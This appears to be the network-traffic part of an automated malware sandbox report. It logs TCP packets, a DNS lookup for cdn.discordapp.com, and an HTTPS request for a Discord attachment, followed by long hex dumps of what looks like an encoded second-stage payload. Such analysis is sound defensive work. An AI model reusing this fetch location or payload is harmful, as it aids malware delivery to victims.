                                                                                                                                                                        Oct 28, 2021 04:56:06.035108089 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.035152912 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.035370111 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.035396099 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.035449028 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.035456896 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.035504103 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.035641909 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.035666943 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.035713911 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.035722017 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.035748959 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.035777092 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.036037922 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.036062956 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.036138058 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.036155939 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.036205053 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.036473036 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.036499977 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.036544085 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.036554098 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.036621094 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.278167963 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.278261900 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.278357029 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.278369904 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.278445959 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.281078100 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.287816048 CEST49707443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.287859917 CEST44349707162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.287966013 CEST49707443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.288505077 CEST49707443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.288517952 CEST44349707162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.325136900 CEST44349707162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.330508947 CEST49707443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.330532074 CEST44349707162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.502538919 CEST44349707162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.502612114 CEST44349707162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:06.502675056 CEST49707443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:06.505669117 CEST49707443192.168.2.5162.159.135.233

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 28, 2021 04:56:05.348316908 CEST6434453192.
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST53643448.8.8.8192.168.2.5

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                        Oct 28, 2021 04:56:05.348316908 CEST192. query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • cdn.discordapp.com

                                                                                                                                                                        HTTPS Proxied Packets

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                                                                                                                                                                        2021-10-28 02:56:05 UTC0OUTGET /attachments/897402450376536075/897465559711633408/8NMrqq.txt HTTP/1.1
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                                                                                                                                                                        2021-10-28 02:56:05 UTC0INHTTP/1.1 200 OK
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                                                                                                                                                                        2021-10-28 02:56:05 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
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                                                                                                                                                                        2021-10-28 02:56:05 UTC2INData Raw: c2 84 c2 b4 c2 a7 c2 ac c2 8b c2 a0 c2 a8 c3 80 c2 a6 c2 88 c2 a3 c2 a9 c2 ba c3 a0 c3 a2 c3 a0 c2 94 c2 a0 c2 b7 c2 bc c2 9b c2 b0 c2 bb c2 a9 c2 b5 c2 ae c2 b0 c2 b9 c2 aa c3 90 c3 91 c3 90 c2 a9 c2 bf c2 8c c2 b7 c2 89 c2 ac c2 87 c2 99 c2 85 c2 9e c2 86 c2 af c2 9a c3 90 c3 82 c3 80 c2 b4 c2 8e c2 97 c2 95 c2 bb c2 90 c2 9b c2 8b c2 95 c2 8e c2 93 c2 99 c2 bd c2 b0 c2 90 c2 b0 c3 84 c3 b0 c3 a7 c3 ac c3 8b c3 a0 c3 ab c3 b9 c3 a5 c3 be c3 a3 c3 a9 c3 ba c2 a0 c2 a2 c2 a0 c3 84 c3 a0 c3 b7 c3 bc c3 8b c3 b2 c2 8f c3 91 c3 ae c3 b8 c3 8a c3 8e c3 b2 c2 a6 c2 92 c2 90 c3 9f c3 90 c3 97 c3 8c c3 ab c3 80 c3 8e c3 af c3 86 c3 a8 c3 83 c3 89 c3 99 c2 a6 c2 82 c2 80 c3 b4 c3 8d c2 a2 c3 95 c3 bb c3 90 c3 9b c3 89 c3 95 c3 8e c3 93 c3 99 35 71 71 71 03 31 24
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                                                                                                                                                                        2021-10-28 02:56:05 UTC8INData Raw: c3 8e c2 9b c3 9b c3 ac c3 92 c3 b8 c3 b5 c3 b0 c3 b4 c3 ab c2 92 c2 ba c2 94 c2 a7 c2 bc c3 a5 c2 89 c2 8d c3 9a c2 90 c2 8c c3 bc c3 86 c3 8e c3 83 c3 bd c3 a8 c2 a2 c2 97 c2 bc c3 85 c3 98 c2 b0 c3 89 c3 a9 c3 85 c3 86 c3 93 c3 af c2 a8 c3 95 c3 a1 c3 bc c2 9a c2 b4 c2 87 c2 9c c3 af c3 92 c3 a6 c3 b6 c3 8a c3 be c2 a5 c3 a1 c3 a2 c3 bd c3 96 c3 9d c2 8c 60 55 17 3f 11 2c 18 27 23 4d 24 3a 22 2a 3b 76 6b 41 07 2f 27 3d 11 4e 12 27 26 0e 1b 32 21 16 54 5b 03 6e 03 7a 38 07 1b 6f 0d 6b 1a 03 75 66 54 6e 30 07 0e 1f 01 11 3c 39 62 19 06 1a 1e 47 1e 4a 4e 7e 65 67 73 1e 7a 50 40 79 1b 6a 7b 3f 26 25 46 65 65 59 5a 7b 52 67 63 6b 62 0f 79 27 02 64 61 5e 4e 3c 78 5e 24 58 56 51 77 46 50 1d 00 0b 5d 3e 51 57 5c 78 74 4a 50 49 52 5a 69 26 c3 8a c3 bb c2 a3 c3
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                                                                                                                                                                        2021-10-28 02:56:05 UTC9INData Raw: 6d 4d 76 51 5a 53 4d 25 68 26 43 06 38 09 61 51 46 5d 7f 2b 5e 44 7b 34 56 c2 af c2 9f c3 a6 c2 83 c2 84 c3 b5 c2 bd c2 87 c3 9b c2 85 c2 a2 c2 ab c2 af c2 b6 c2 b4 c3 90 c2 b0 c2 91 c2 9a c3 96 c3 a0 c2 92 c2 a6 c2 9d c2 bd c2 80 c2 91 c2 9e c2 81 c2 82 c2 81 c2 a5 c2 87 c2 94 c3 96 c3 b8 c3 9d c2 87 c2 89 c2 a0 c2 8a c2 8d c2 9b c2 9f c2 b0 c2 91 c2 94 c2 ac c3 a7 c2 b7 c3 b4 c2 b9 c3 96 c2 b2 c2 82 c3 ac c2 81 c2 a6 c2 89 c2 bb c2 9e c2 97 c2 88 c2 b7 c3 b7 c3 b1 c2 8b c2 b7 c2 b9 c3 b3 c2 83 c3 8d c3 a9 c3 a7 c3 a1 c3 aa c3 b7 c3 9a c2 8d c3 a1 c3 af c3 a1 c2 94 c2 a0 c2 a6 c3 92 c3 ae c3 ad c3 b2 c3 95 c3 b6 c3 bf c2 9a c3 b1 c3 bc c3 b1 c3 87 c3 94 c2 96 c2 b8 c2 99 c3 a5 c3 84 c3 a2 c3 a0 c3 a6 c3 a4 c3 8a c3 97 c3 a8 c3 88 c2 b2 c3 8e c2 b3 c2 85
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                                                                                                                                                                        2021-10-28 02:56:05 UTC10INData Raw: c3 bd c3 92 c2 a3 c2 96 c2 9d c3 a3 c2 a4 c3 9b c3 89 c3 88 c3 91 c3 98 c2 ae c3 8c c3 9b c3 ab c3 8c c3 93 c2 8d c2 b2 c3 b1 c3 ad c3 85 c3 b5 c3 9e c2 88 c3 ae c3 8d 40 3d 38 00 53 48 07 5c 71 2b 2e 0c 2e 38 57 39 32 3a 16 3d 33 20 62 66 62 3b 09 1c 32 3a 22 25 1f 1d 18 7c 14 16 2e 7a 5c 2e 1a 21 09 34 21 2a 2d 19 2b 33 13 00 4d 47 49 0a 05 01 15 31 16 1e 7b 44 67 74 11 62 3e 44 35 3e 14 40 70 39 77 03 0d 55 64 45 7e 70 1f 27 22 78 1c 4b 6e 55 7f 75 56 5d 58 7f 60 42 1e 23 0f 7c 56 7e 4e 16 4b 7b 7b 5f 40 5d 42 44 06 04 1b 7a 5a 4d 4f 74 6f 5e c2 bb c2 ab c2 b0 c3 94 c2 b0 c2 a5 c3 a4 c3 91 c3 b2 c2 a6 c2 a7 c2 a9 c2 b6 c2 93 c2 aa c2 88 c2 a3 c2 b9 c2 a0 c3 84 c2 b3 c2 a0 c3 a6 c3 a1 c3 ac c2 9e c2 ae c2 ba c2 be c2 b9 c3 86 c2 a4 c2 a4 c2 9d c2 98 c2
                                                                                                                                                                        Data Ascii: @=8SH\q+..8W92:=3 bfb;2:"%|.z\.!4!*-+3MGI1{Dgtb>D5>@p9wUdE~p'"xKnUuV]X`B#|V~NK{{_@]BDzZMOto^
                                                                                                                                                                        2021-10-28 02:56:05 UTC12INData Raw: b0 c2 ba c2 a7 c2 b8 c2 b0 c2 ad c3 a5 c3 b2 c3 ae c2 b7 c2 a9 c2 b9 c2 9b c3 9b c2 99 c2 b2 c2 93 c2 8a c2 93 c2 a0 c2 8d c3 ae c3 9c c3 88 c2 b7 c2 b9 c2 91 c2 a1 c3 bd c3 89 c2 9d c2 b8 c2 8b c2 bd c2 a0 c2 9a c3 a4 c2 88 c3 bf c3 89 c3 89 c2 bb c2 8d c2 b4 c2 9e c3 99 c3 8e c3 89 c3 b0 c3 82 c3 be c2 9a c3 86 c3 af c2 b1 c2 a0 c2 b9 c3 8e c2 8c c3 bf c3 bc c3 9c c3 9f c3 b0 c3 a0 c3 bf c3 9e c3 b8 c3 b7 c3 84 c3 83 c2 b1 c2 af c3 9b c3 a9 c2 85 c3 a6 c3 bf c3 aa c3 80 c3 81 c3 8e c3 97 c2 bb c3 8c c2 a9 c2 bf c2 81 c2 99 c3 ae c3 a0 c3 8b c3 8a c3 8a c3 88 c3 98 c3 91 c3 9e c3 87 c3 8e c3 80 c2 b9 c2 af c2 91 c2 89 c2 82 c3 af c2 a5 39 1e 0f 23 3a 28 2c 5b 03 3f 5c 7a 75 19 1f 0b 2b 28 0c 27 2e 4f 02 21 3f 37 44 45 69 68 2a 57 79 2e 13 77 3b 08 32 0b
                                                                                                                                                                        Data Ascii: 9#:(,[?\zu+('.O!?7DEih*Wy.w;2
                                                                                                                                                                        2021-10-28 02:56:05 UTC13INData Raw: 23 4a 2b 2b 4c 79 55 76 04 27 20 0f 0d 35 44 20 3d 2c 37 34 02 7a 7d 47 2b 11 28 06 3d 2d 01 3a 72 30 2a 0c 19 56 5d 4c 02 2f 06 3f 11 11 17 74 1f 72 0f 1b 27 4d 4b 75 47 61 48 66 5d 6f 74 42 11 79 15 1f 79 3d 3e 35 7f 15 46 53 54 79 5c 6f 6f 4b 52 6d 5c 07 3b 0b 10 63 53 41 40 3d 37 7a 57 5b 40 5d 70 06 11 1d 77 45 53 51 50 44 27 72 44 43 79 24 7f 09 26 04 c2 94 c2 97 c2 86 c2 b8 c2 88 c2 ad c2 a4 c2 b4 c2 9f c2 91 c2 b2 c2 9a c2 b9 c3 b9 c3 bb c2 88 c2 94 c2 83 c2 b0 c2 b9 c2 98 c2 b9 c2 9c c2 ab c2 b1 c2 89 c2 9b c2 a8 c2 aa c3 8b c3 ae c3 a5 c2 8c c2 81 c3 b3 c2 bf c3 9f c2 85 c2 a2 c3 a5 c2 86 c2 9b c2 86 c2 9c c2 8c c3 95 c2 ad c3 9a c2 85 c2 81 c2 b8 c2 96 c2 af c2 9f c2 87 c2 84 c2 84 c2 83 c2 a3 c2 91 c3 be c3 88 c3 ad c3 bd c3 87 c3 b5 c3 a3 c3
                                                                                                                                                                        Data Ascii: #J++LyUv' 5D =,74z}G+(=-:r0*V]L/?tr'MKuGaHf]otByy=>5FSTy\ooKRm\;cSA@=7zW[@]pwESQPD'rDCy$&
                                                                                                                                                                        2021-10-28 02:56:05 UTC14INData Raw: ad c2 a2 c2 86 c2 90 c2 80 c2 94 c2 b3 c2 84 c2 ac c2 8a c2 bb c2 92 c2 9c c2 b0 c2 9b c2 b8 c3 ac c3 a9 c3 a7 c3 bc c3 99 c3 a8 c3 86 c2 8c c3 a3 c3 b9 c3 b4 c3 aa c3 ad c2 a4 c2 a5 c2 b7 c3 84 c3 b7 c3 ac c3 bf c3 8c c2 81 c3 93 c3 a6 c3 95 c3 a4 c3 b4 c3 b1 c3 8c c2 b4 c2 a9 c2 a6 c3 a4 c3 90 c3 87 c3 8c c3 ae c3 b8 c3 a6 c3 af c3 bd c3 9e c2 ba c3 b8 c3 be c2 8d c2 ab c2 84 c3 b1 c3 b8 c3 ba c3 9c c3 8b c3 94 c3 b3 c3 84 c3 96 c3 97 c3 be c3 a8 36 47 72 79 0f 48 37 25 2c 35 31 4a 55 38 51 2e 25 71 62 69 3b 4f 12 06 67 40 10 23 2b 37 15 30 3d 46 22 48 17 01 7d 0d 24 01 0b 10 2a 0b 73 2f 2d 46 32 48 20 09 64 36 37 15 0a 07 32 36 68 1c 5d 0a 26 14 63 61 46 6d 56 69 71 78 67 0a 73 60 65 07 21 21 56 58 74 7a 41 55 7c 6e 72 6f 09 6b 46 32 33 00 67 51 34 5f
                                                                                                                                                                        Data Ascii: 6GryH7%,51JU8Q.%qbi;Og@#+70=F"H}$*s/-F2H d6726h]&caFmViqxgs`e!!VXtzAU|nrokF23gQ4_
                                                                                                                                                                        2021-10-28 02:56:05 UTC16INData Raw: 74 5c 71 30 69 6f 79 61 72 7c 7d 4e 5d 48 0a 68 6c 77 73 57 70 57 60 64 49 37 4d 7e 03 64 23 72 54 3b 47 4e 35 67 58 2b 51 5c 5d 43 75 09 03 59 3d 73 5b 64 56 4f 7b 44 c2 ba c3 9f c2 a2 c2 83 c2 85 c3 9e c3 bb c2 97 c2 be c2 bb c2 96 c2 95 c2 ac c3 9f c2 b2 c2 90 c3 88 c2 96 c2 97 c2 a9 c3 b4 c3 a6 c3 a4 c2 ba c2 a8 c2 93 c2 bf c2 98 c2 a3 c2 ac c2 9b c2 b2 c2 a4 c2 8d c2 85 c2 87 c3 83 c3 85 c3 a2 c2 a3 c2 aa c2 8b c2 80 c2 a2 c3 b1 c2 9c c2 8d c2 81 c2 92 c2 9f c2 95 c2 95 c3 8c c3 b1 c3 81 c2 a0 c2 94 c2 8a c3 ba c2 b7 c2 b2 c3 b5 c2 81 c2 94 c3 94 c3 ab c3 a5 c3 b6 c2 b2 c2 ae c2 a5 c3 a3 c3 84 c3 bf c3 a2 c2 b2 c3 b4 c3 b7 c3 bd c3 ba c3 88 c3 bb c3 a4 c3 85 c2 93 c2 b5 c2 88 c3 80 c3 bc c2 83 c3 84 c2 a1 c3 a2 c3 a7 c3 bc c3 92 c3 ab c3 9b c3 b3 c2
                                                                                                                                                                        Data Ascii: t\q0ioyar|}N]HhlwsWpW`dI7M~d#rT;GN5gX+Q\]CuY=s[dVO{D
                                                                                                                                                                        2021-10-28 02:56:05 UTC17INData Raw: a1 c3 b9 c3 b1 c3 85 c3 89 c3 9e c2 a9 c3 98 c2 9a c3 88 c3 a1 c3 92 c3 a7 c3 82 c3 92 c3 97 c3 b7 c2 b2 c3 b5 c3 98 c2 b7 c3 ad c2 bf c3 ae c3 b9 c3 8d c3 ab c3 b2 c3 97 c2 aa c3 b6 c2 a4 c3 87 c3 81 c3 91 c3 86 c3 b4 c3 bd c2 be c3 a6 c3 a9 c2 a6 c3 a0 c3 b5 0d 18 14 2e 10 28 0d 37 0b 14 72 17 1e 57 0c 3b 14 2b 30 33 24 10 3d 39 4e 12 5f 2a 04 27 25 33 3a 08 3d 08 2d 2d 2f 2b 58 34 5e 14 17 7f 28 26 72 1e 0f 06 20 63 26 34 5e 52 59 4d 3a 08 38 36 06 15 72 76 50 12 14 62 38 23 3f 3e 68 77 64 58 5e 1d 16 0c 77 73 60 40 24 27 30 25 5e 07 42 6b 47 6a 7d 48 24 4e 52 21 1e 02 09 1f 61 5b 64 11 7e 4b 41 46 60 23 7e 33 26 38 0f 74 47 2a 52 73 c2 ae c2 bb c2 a0 c2 8e c2 84 c2 a8 c2 8d c2 b7 c2 96 c3 81 c3 a8 c2 97 c2 9e c3 97 c2 90 c2 86 c2 ae c2 b0 c2 94 c2 be
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                                                                                                                                                                        2021-10-28 02:56:05 UTC18INData Raw: c2 b2 c2 a7 c2 8b c2 87 c2 bd c2 82 c2 ba c2 88 c2 86 c3 b8 c3 b9 c2 b4 c2 80 c2 bd c2 9e c2 bd c2 ae c2 b7 c2 9f c3 94 c2 a6 c2 94 c2 a3 c3 af c3 87 c3 a0 c2 8c c2 a9 c2 91 c2 a9 c2 86 c3 bb c2 96 c2 bc c2 84 c2 95 c3 bf c2 a9 c2 8c c3 9b c3 9f c3 9f c2 b2 c2 b1 c2 96 c2 8a c2 9d c2 ae c2 95 c2 aa c2 9d c3 b7 c2 93 c2 8c c2 8f c3 8d c3 97 c3 9e c3 97 c2 be c3 b5 c3 87 c3 8b c2 98 c2 88 c3 bc c3 b3 c3 93 c2 9e c3 86 c3 87 c2 97 c2 a7 c2 ae c3 87 c3 b9 c3 99 c3 b7 c3 85 c3 9d c2 8e c3 91 c3 8e c3 89 c3 ae c3 af c3 8f c2 99 c2 a4 c2 83 c3 9c c3 90 c3 a4 c3 a5 c3 97 c3 8b c2 a8 c3 90 c3 b0 c3 9a c2 b6 c3 a2 c3 9a c3 b1 c2 92 c2 91 c3 b2 c3 bd c2 aa c3 ac c3 88 c3 8d c3 8d c3 85 c3 9d c2 bd c3 9b c3 9e c3 94 c2 ad c3 a1 c3 a5 c3 8f 22 3b 39 01 28 22 3c 32 1c
                                                                                                                                                                        Data Ascii: ";9("<2
                                                                                                                                                                        2021-10-28 02:56:05 UTC20INData Raw: bf c3 98 c3 81 c3 91 c2 a5 c3 a7 c3 92 c2 a2 c3 98 c3 95 c3 93 c2 a8 0b 44 33 21 3e 3e 7b 1d 3d 16 21 57 54 29 20 59 1a 16 05 27 20 07 69 3f 22 2a 2f 0f 5c 4d 5a 7e 5b 42 07 1b 0b 17 53 39 72 2c 3c 16 2b 26 1e 2d 46 50 46 01 0e 0e 49 26 0e 03 67 19 0a 1a 10 69 4b 1c 34 59 54 68 4f 4a 40 7c 64 7f 7a 7b 58 0d 20 0f 50 09 4d 6f 41 59 02 5e 71 7d 02 54 68 19 10 3f 60 3d 28 5c 71 69 32 30 43 4d 45 64 58 29 00 2f 70 34 2f 7a 6c 7a 7c 4c 54 4f 4a 4b 68 76 c3 86 c3 9f c2 80 c3 84 c2 ab c2 a2 c2 91 c2 89 c3 93 c3 8f c2 ae c2 b5 c2 9b c2 86 c2 be c2 8c c2 8d c3 a6 c2 8e c2 81 c3 8e c2 8f c2 ac c3 8c c2 a2 c2 bb c2 ba c2 ab c2 99 c2 be c2 ae c2 96 c3 b0 c3 9b c3 97 c2 81 c2 9e c2 9e c3 9f c2 bd c3 be c2 b6 c2 81 c3 aa c3 ac c2 89 c2 80 c3 b9 c2 ad c3 91 c2 8c c2 91
                                                                                                                                                                        Data Ascii: D3!>>{=!WT) Y' i?"*/\MZ~[BS9r,<+&-FPFI&giK4YThOJ@|dz{X PMoAY^q}Th?`=(\qi20CMEdX)/p4/zlz|LTOJKhv
                                                                                                                                                                        2021-10-28 02:56:05 UTC21INData Raw: c2 a3 c2 a8 c2 9e c2 bc c2 ae c2 a0 c3 b1 c3 a7 c2 9a c2 98 c2 ba c3 b9 c2 a7 c2 b2 c2 b1 c3 98 c3 97 c2 bc c2 80 c2 be c2 96 c2 b0 c3 ab c2 ba c2 87 c3 a1 c2 9a c2 89 c3 b6 c2 81 c2 80 c3 84 c2 9a c3 87 c2 81 c2 8b c3 a1 c3 9e c3 84 c2 87 c3 ad c3 9a c3 aa c3 b9 c3 a6 c2 8a c2 90 c2 a7 c2 8a c3 97 c3 99 c3 9c c3 b2 c3 96 c3 96 c3 bc c3 b8 c3 b0 c3 8a c3 b2 c3 ab c3 91 c3 bc c2 a3 c2 8e c2 9b c3 b4 c2 bd c3 b4 c3 93 c2 ba c3 a2 c3 a4 c3 86 c2 ae c3 84 c3 9f c2 b7 c2 84 c2 98 c2 97 c3 90 c3 8d c3 9c c3 8a c3 ae c3 b4 c2 b7 c3 ac c3 94 c3 99 37 30 34 55 74 5b 04 40 0d 31 1d 05 56 0a 16 3b 26 27 49 6c 64 4b 14 50 4f 3c 3f 25 2a 27 30 2b 16 17 61 2b 50 7b 24 61 7f 14 02 15 1a 17 00 13 2c 25 02 7a 3e 47 05 00 70 14 41 63 19 0d 68 67 6b 65 00 15 27 26 76 41 61
                                                                                                                                                                        Data Ascii: 704Ut[@1V;&'IldKPO<?%*'0+a+P{$a,%z>GpAchgke'&vAa
                                                                                                                                                                        2021-10-28 02:56:05 UTC22INData Raw: 2e 1e 0a 0e 09 7f 0a 0b 39 27 33 13 04 46 44 4a 1c 27 20 1e 17 6f 15 5c 7d 78 58 68 1a 32 12 09 78 6a 41 63 77 77 44 6b 59 0e 5b 54 45 00 03 44 59 7c 68 41 52 66 78 5f 38 5e 62 52 53 06 14 0b 79 27 4c 7d 64 34 35 47 54 44 5e 5f 68 10 32 20 6a 4a 71 51 09 79 4e c2 b3 c2 ba c2 b2 c2 9a c3 90 c2 a2 c3 94 c3 bd c2 90 c2 8e c2 94 c2 99 c2 a9 c2 86 c2 ab c2 b9 c2 a3 c2 bf c2 a0 c2 bd c2 b3 c2 b2 c3 ae c3 93 c3 ac c2 8c c2 a6 c2 b0 c3 81 c2 91 c2 b5 c2 bd c2 93 c2 8f c2 99 c2 85 c2 a1 c2 82 c3 9e c3 85 c3 98 c2 a5 c3 af c2 a1 c2 8b c2 84 c2 b1 c2 a4 c2 8b c2 95 c3 b9 c2 86 c2 9b c2 a6 c2 bf c3 81 c2 bf c2 ac c2 86 c2 88 c3 a3 c2 b8 c3 a4 c2 85 c3 ba c2 81 c3 89 c3 b4 c3 b7 c2 86 c2 90 c2 a0 c2 ba c3 b5 c3 ba c3 81 c3 ab c3 ba c3 92 c3 85 c3 ba c3 84 c3 96 c3 a9
                                                                                                                                                                        Data Ascii: .9'3FDJ' o\}xXh2xjAcwwDkY[TEDY|hARfx_8^bRSy'L}d45GTD^_h2 jJqQyN
                                                                                                                                                                        2021-10-28 02:56:05 UTC24INData Raw: c3 93 c3 9d c3 80 c3 ad c3 a4 c2 bb c2 aa c2 8f c3 99 c3 b1 c3 bd c3 a1 c3 90 c3 bd c3 b7 c3 87 c3 aa c3 b0 c2 8c c3 97 c3 b4 c2 84 c3 9b c2 ac c2 ac c3 a5 c3 b0 c3 91 c3 ac c3 89 c3 85 c3 9c c3 b1 c3 9b c3 b1 c3 80 c3 89 c3 a8 c2 b1 c2 9c c2 9d c3 9b c3 8f c3 8d c3 94 c2 a9 c3 94 c3 98 c3 88 c3 8f c3 af c3 8b c3 9f c2 81 c2 98 c3 be c3 bf c3 80 c3 94 18 1f 22 13 3c 39 25 47 2d 2e 72 71 09 0a 39 2d 3a 1d 33
                                                                                                                                                                        Data Ascii: "<9%G-.rq9-:3
                                                                                                                                                                        2021-10-28 02:56:05 UTC24INData Raw: 39 3f 2e 2c 0c 3c 46 6e 40 6b 2c 02 18 01 27 73 28 1f 20 00 00 7a 0e 52 49 2b 23 68 2f 33 2f 02 26 0f 6c 04 6b 10 0f 5a 4b 46 03 7b 11 7a 4d 6a 61 77 6b 70 42 66 6c 03 1e 2f 4a 7a 6d 7a 64 5c 7d 67 69 6c 68 7b 64 2d 1f 2b 34 53 69 62 1b 4a 55 57 70 58 70 47 74 63 0b 16 42 4d 6b 42 6a 4d 4a 5e 4b 53 4a 5c 5b 1e 0f 18 6a 5d 78 c2 a2 c2 a6 c2 bc c2 97 c2 9d c2 85 c2 b0 c2 81 c2 ac c3 8a c3 bc c3 b8 c3 bd c2 8a c2 ba c2 ad c2 ab c2 97 c2 a3 c2 b3 c3 92 c2 be c2 9c c2 94 c3 8a c2 9c c3 ae c3 b8 c3 bf c2 90 c2 be c2 bf c2 92 c2 bf c2 82 c2 b3 c2 90 c2 9e c2 b9 c2 91 c2 86 c2 9c c3 9e c3 be c3 a5 c2 93 c2 9e c2 a5 c2 91 c2 ae c2 88 c2 b8 c2 8b c2 b3 c3 ae c2 a8 c2 93 c2 a4 c2 a4 c3 a5 c3 86 c2 92 c2 9d c2 8d c3 80 c3 9d c3 a4 c3 87 c3 98 c2 92 c3 82 c3 a9 c3 af
                                                                                                                                                                        Data Ascii: 9?.,<Fn@k,'s( zRI+#h/3/&lkZKF{zMjawkpBfl/Jzmzd\}gilh{d-+4SibJUWpXpGtcBMkBjMJ^KSJ\[j]x
                                                                                                                                                                        2021-10-28 02:56:05 UTC25INData Raw: c2 8b c2 97 c2 98 c2 a2 c3 99 c3 87 c3 b4 c3 95 c3 bd c3 97 c3 a4 c2 bf c3 a3 c3 82 c3 ac c3 a6 c3 ab c3 a7 c3 a0 c3 92 c2 ad c2 a9 c2 84 c2 a3 c3 b4 c2 9e c2 97 c3 ac c3 95 c3 81 c3 aa c3 b6 c3 ab c3 b7 c3 b4 c3 81 c3 94 c2 9a c2 83 c2 97 c3 96 c3 a6 c3 8a c3 a8 c3 89 c3 bc c3 9b c3 95 c3 8b c3 ac c2 bb c3 9d c2 8f c2 bf c2 9d c3 b7 c3 81 c3 b8 c3 94 c3 80 c2 b7 c3 bf c3 81 c3 90 c3 8b c3 90 c3 9c c3 9a c2 98 c2 9c 72 16 2e 51 3e 19 2a 0d 36 1f 52 0d 5a 3e 7e 78 62 04 2e 06 33 6e 38 0e 12 37 28 36 33 00 17 5b 7c 0f 07 01 0e 29 0a 2d 16 12 0a 06 03 30 47 2f 37 24 0e 61 19 3b 1a 3d 0e 7d 1b 16 13 0d 3f 43 35 44 72 49 65 5a 6c 75 4d 72 70 15 6c 5e 3a 14 2d 41 64 61 48 4b 76 05 64 1d 66 53 63 60 08 2c 12 4c 52 69 41 66 5d 46 7e 44 6e 47 4b 49 0d 1f 27 75 70
                                                                                                                                                                        Data Ascii: r.Q>*6RZ>~xb.3n87(63[|)-0G/7$a;=}?C5DrIeZluMrpl^:-AdaHKvdfSc`,LRiAf]F~DnGKI'up
